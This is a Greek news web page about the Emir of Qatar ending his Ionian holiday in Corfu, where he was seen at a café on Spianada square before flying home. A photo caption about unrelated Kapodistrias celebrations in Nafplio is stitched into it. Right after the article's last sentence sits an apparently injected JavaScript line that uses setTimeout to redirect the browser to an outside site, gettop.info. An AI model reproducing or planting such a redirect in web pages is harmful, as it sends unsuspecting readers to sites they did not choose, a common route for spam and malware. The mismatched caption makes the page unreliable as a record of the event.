Στο νησί των Φαιάκων ο Εμίρης του Κατάρ

0
7
Χορευτές από την Κέρκυρα παίρνουν μέρος στις εκδηλώσεις στο πλαίσιο των εορτασμών για τον Ιωάννη Καποδίστρια στο Ναύπλιο, Κυριακή 27 Σεπτεμβρίου 2015. Στο πλαίσιο των ετήσιων εκδηλώσεις μνήμης και τιμής στον πρώτο κυβερνήτη της Ελλάδας Ιωάννη Καποδίστρια, που διοργάνωσε ο Δήμος Ναυπλιέων, στις 27 Σεπτεμβρίου 2015 στο Ναύπλιο πραγματοποιήθηκε μουσικοχορευτική παράσταση του Λυκείου Ελληνίδων Αθηνών. Με τίτλο “Από τις ρούγες της Κέρκυρας στα σοκάκια τ’ Αναπλιού”, η μουσικοχορευτική παράσταση του Λυκείου Ελληνίδων Αθηνών πραγματοποιήθηκε στις πλατείες Τριών Ναυάρχων και Συντάγματος. Πλήθος κόσμου παρακολούθησε τους χορούς και τα τραγούδια των Κερκυραίων που έδωσαν επτανησιακό χρώμα στην πόλη του Ναυπλίου τιμώντας τον πρώτο κυβερνήτη της χώρας. ΑΠΕ-ΜΠΕ /ΑΠΕ-ΜΠΕ/ΜΠΟΥΓΙΩΤΗΣ ΕΥΑΓΓΕΛΟΣ

 

Με τελευταίο σταθμό την Κέρκυρα ο Εμίρης του Κατάρ, Σεΐχ Χαμάντ μπεν Χαλίφα αλ Θάνι, ολοκλήρωσε τις διακοπές του στο Ιόνιο.

Ο ζάμπλουτος σεΐχης έφτασε στο αγαπημένο του νησί την Πέμπτη, έπειτα από πολυήμερη διαμονή στα νησιά του Ιονίου, καθώς προηγουμένως είχε επισκεφθεί τη Λευκάδα, την Ιθάκη και την Κεφαλονιά.

single-post

Το Αθηναϊκό Πρακτορείο εντόπισε τον εμίρη του Κατάρ σε γνωστό καφέ στην κεντρική πλατεία Σπιανάδα της Κέρκυρας.

Ο 64χρονος Εμίρης, φανερά ανανεωμένος, για ακόμη μια φορά εξέπληξε τους Κερκυραίους που τον είδαν να απολαμβάνει τον καφέ του στο κέντρο της πόλης, ντυμένος με ένα απλό T-Shirt και βερμούδα, περιτριγυρισμένος από προσωπικούς του φίλους Κερκυραίους, καθώς και άτομα του πληρώματός του και της προσωπικής του φρουράς.

Ο Εμίρης μετά από την τριήμερη σύντομη διαμονή του στο νησί, αναχώρησε από την Κέρκυρα αεροπορικώς, με ειδική πτήση για το Κατάρ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here